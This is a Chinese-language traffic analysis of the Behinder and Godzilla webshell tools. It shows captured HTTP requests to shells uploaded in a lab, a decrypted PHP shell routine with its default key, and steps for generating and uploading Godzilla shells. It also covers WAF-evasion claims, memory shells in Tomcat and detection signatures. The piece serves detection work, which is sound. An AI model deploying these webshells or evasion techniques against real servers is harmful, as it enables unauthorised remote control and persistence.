冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。
冰蝎的通信过程可以分为两个阶段:
密钥协商
加密传输
1)第一阶段-密钥协商
a.php
攻击者通过GET方式请求服务器密钥;
GET /hackable/uploads/shell.php?pass=300 HTTP/1.1
当我们输入命令操作后,请求方式就会变成POST
POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=lsgi7fb09enqcn3svmti4eqbo7; path=/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.129:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 1112
hxx/2GPvW+iHRI+j7FKIjpbHv6JcLQzyNs8uQ1IPDTB2xcS5+oKiaSKujjcZ/uYLEwn6oA8a1YehtGbT9arlXe3LaA0kig9BITcK3iZZKYhjpK0/ziTfTa5CnU3lfrnmCcadnmtgUKyTZDdb93DSqwyGn3cFb7BuIPkdCu6SpLov3+EExlHPbY/+6PiiDIpWGCxzkEIwli6zJiS8fa4fSxYcr/e0viSLVI3eXHAvhcohXLsVbWV5HmZMovp4EHYkcofLdR7fjx+NZbIfBOTZfzbOTOXBRBI2GBEUZG4uzi7s0xeHzUWeKf/n+CjrCs1OgYT893Q5KyRSr9+wn3Gi8JfDYPKCady
b.jsp
先通过GET方法,向服务器请求随机密钥
GET /s.jsp?pass=987 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16
Date: Wed, 18 Nov 2020 12:32:58 GMT
9e39ae1ad6ee9e32 //服务器返回的密钥
同样输入命令后,也和PHP一样,请求方式就变成了POST
POST /s.jsp HTTP/1.1
Content-Type: application/octet-stream
Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 8556
75Zv64K/CymLAnv5UhDhKfJdj58rU1o/0yZ7D0XlJU7MgTbzaA4zrvImnNs1Y1cmNPGAdxaaEaYxvasJSp2sCHk5TPv+fWunDMvZWoBqjcnkHGMYyohZpH1v7OvWcdAZPg7CIL87y9HPc2lydWTiBVspavD0FkRVY7/XmeWw7m/O42+SE28iQSgyLf/
2)服务器使用密钥
使用随机数MD5的高16位作为密钥,存储到会话的 $_SESSION 变量中,并返回密钥给攻击者。
3)解密
刚才php请求密钥的数据包中获取到的密钥:
95c4e8e4eef4b1ac //服务器返回的密钥
a.请求密文b.输入密钥和请求密文,解密后为 base64 编码
c.base64解码
@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
$key = $_SESSION['k'];
echo encrypt(json_encode($result),$key);
}
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$content="327c829b-f4d3-41eb-a251-d561e01011ec";
main($content);
4)特征总结
a.ACCEPT字段
冰蝎2默认Accept字段的值很特殊,而且每个阶段都一样
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
b.UA字段
冰蝎内置了十余种 UserAgent ,每次连接 shell 会随机选择一个进行使用。但都是比较老的,容易被检测到,但是可以在burp中修改ua头。
c.Content-Length
Content-Length: 16, 16就是冰蝎2连接的特征
对比冰蝎2,冰蝎3取消动态密钥获取,目前很多waf等设备都做了冰蝎2的流量特征分析,所以3取消了动态密钥获取;只有在无动态密钥交互失败后,才会进入常规的密钥交互阶段。
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
//该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
密钥生成可以看出,使用密码的md5结果的前16位。
php抓包
看包没有发现什么特征,但是可以发现它是POST请求的
1)Accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征
2)ua头该特征属于弱特征。通过burp可以修改,冰蝎3.0内置的默认16个userAgent都比较老。现实生活中很少有人使用,所以这个也可以作为waf规则特征。
POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: text/html;charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:777
Connection: keep-alive
Content-Length: 1432
Cookie: PHPSESSID=peimnpkc4hi70akr2seroj6mi2
3Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykVd++xsex2EkGn9p0SgL+GpXlGg6Ol
jsp抓包
特征分析Content-Type: application/octet-stream 这是一个强特征查阅资料可知octet-stream的意思是,只能提交二进制,而且只能提交一个二进制,如果提交文件的话,只能提交一个文件,后台接收参数只能有一个,而且只能是流(或者字节数组);很少使用。
POST /3.jsp HTTP/1.1
Content-Type: application/octet-stream
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Cache-Control: no-cache
Pragma: no-cache
Host: x.x.x.x:888
Connection: keep-alive
Content-Length: 11864
Cookie: JSESSIONID=F063F33F5F8BE2F3C75311C7128E70D1
F1w4ahdSJGUxG3t11sfr6qxbThq9VnL7i6K1/NzHsb0s9eQIfj2qDW/r5OeNJjI0U/BrUp2pHtrtCkdiUeJVIKFzCMSfe8yhEddJFJideje6Eb0dtrHHd9YYaZcxqQL2FFusmCXFICrCh3MsG+BYZHKbNVkWJrsTiu/1VBPV9CBkJzPBO4aH98EBFycyQbpGCHjAPaZmbaIIVWenbm642/xYr85uQ5/K74vlQ9wR5iGLZvyH8WZOF0YpqhxjkApKeShoSGX/C87NiqMTVAB+DcFNf4HaitS1o7Q6kXnUET00L5irn+WdNis2mvNEzr+DGay6LSKKD9kDl6iTKD/1aiXfk5EgH4PfR0/aXCEKTsFW29So6wbhR6u4H3/
哥斯拉是一个基于流量、HTTP全加密的webshell管理工具相对于蚁剑,冰蝎;哥斯拉具有以下优点。
全部类型的shell均过市面所有静态查杀
流量加密过市面全部流量waf
Godzilla自带的插件是冰蝎、蚁剑不能比拟的
(1)Godzilla的运行需要java环境。在cmd下切换到哥斯拉所在目录,输入
java -jarGodzilla.jar
此时会在同目录下生成data.db数据库存放数据(2)Godzilla的webshell可以自定义生成操作方法:管理-生成所需的webshell,哥斯拉支持jsp、php、aspx等多种载荷java和c#的载荷原生实现AES加密
PHP使用亦或加密(3)将生成的webshell上传到目标机器,然后在Godzilla目标栏添加相应的url
(1)php_XOR_BASE64
设置代理,用burp抓包。截取到特征发现请求都含有"pass="第一个包
POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23275
Connection: close
pass=KX4nWAFVJ005aWdeUVosCjpuL0k7YApWKGVGfHFTUXg5WDNFOwszSQEDAVVRWjdGKHU3RwBgLEkGRgV5e3cgVCpxP0YBVVBRB3d3WlFZJ0c5bjdcAVEGUgB2BEh%2BXQJeMGMdQAMKN2M
BAmALeE1UWjpuK1wsUjN%2FAVx7RGhzNFwpBFRcBn9YTylIXkJ9Q1F4J2cKVyt7IF4CZmxVeXczVTYGM2Q3CA1pN11GW2taDUQ6bitKOgpYTjlmAFRrWSdJOWE3QAFRK10zZQQCUVo3XyhuFn4hUSBeKnJ0VXt3IFQycS8FAX8nQwAADERRczdGOwQvWAEKN1ICaXxdeW
ASfSBfJFcreyMAJ2BafHFdIFQqdSdJOGAzCABcAVVrWSdJOWI8ADBvVFMBA2deeXM3ATphHXcGb1RTKHJeQn1DUXgFZ1V7JmkRVAdmAFhWcw1FAV8nWQdgI1EAAntUUAcjXwFaXFk7YC9VOXZZS3l3DQQnZwp
XK3sgXgJmbF17YSNeAmEdXDoKNw0CaXsCUU0GXTpYCUc7YC9DOwMMRWhjVFU6WyNKOG8zSQBYVkJ5bBJ9IF8kVyt7IF4qcnRVY3NQQTlxCUkpewVQBml3WlE
第二个包
POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
pass=AWEzAAN%2FWFI3XHNGaGBQWDEHPwY4fSQAM2AIDw%3D%3D
(2)php_XOR_RAW
执行ls和cat命令,命令虽然不同,但是发现请求中都含有一样的
:•T[6•
L9e
ls命令的包
POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 56
Connection: close
:•T[6•
L9e•[aqP•)[T\••O9t
cat命令的包
POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close
:•T[6•
L9e•h•_8D0c+r•}•L6[gYccY
)[T\••O9t
当以为这就是特征时就大错特错了,这只是这一次连接所含有的特征
(1)java_AES_BASE64
POST /gejs.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 33035
Connection: close
pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBu
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=509B4522D1A54112AA93CCAE0311FEFD; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:04:32 GMT
Connection: close
与php请求一样都含有"pass="而且发起连接时服务器返回的Content-Length是0
(2)java_AES_RAW
POST /rwj.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23360
Connection: close
Óó•Á°Oêû•Ñl•ÎÓ•ô:Ô=Àôg•t*•+¡¼0••åwÝXó•Ô¨ühãGJ¡&ÆwüC•••¢••s•ðÓ••It£•sXü•u9±•{Z•c•,hª•W$n^FþV©•ì•®øav«cÑäöÎõ•³è:Ê
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C26762D96A561D4A63BDE104E22930C; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:19:56 GMT
Connection: close
内存shell模块实现了在tomcat中上传一个哥斯拉的马或者冰蝎、菜刀的马。甚至是上传regeorg建立http隧道。在这里我选择上传一个冰蝎马。然后在冰蝎连接,成功连接。内存shell 无日志,会在tomcat重启后消失。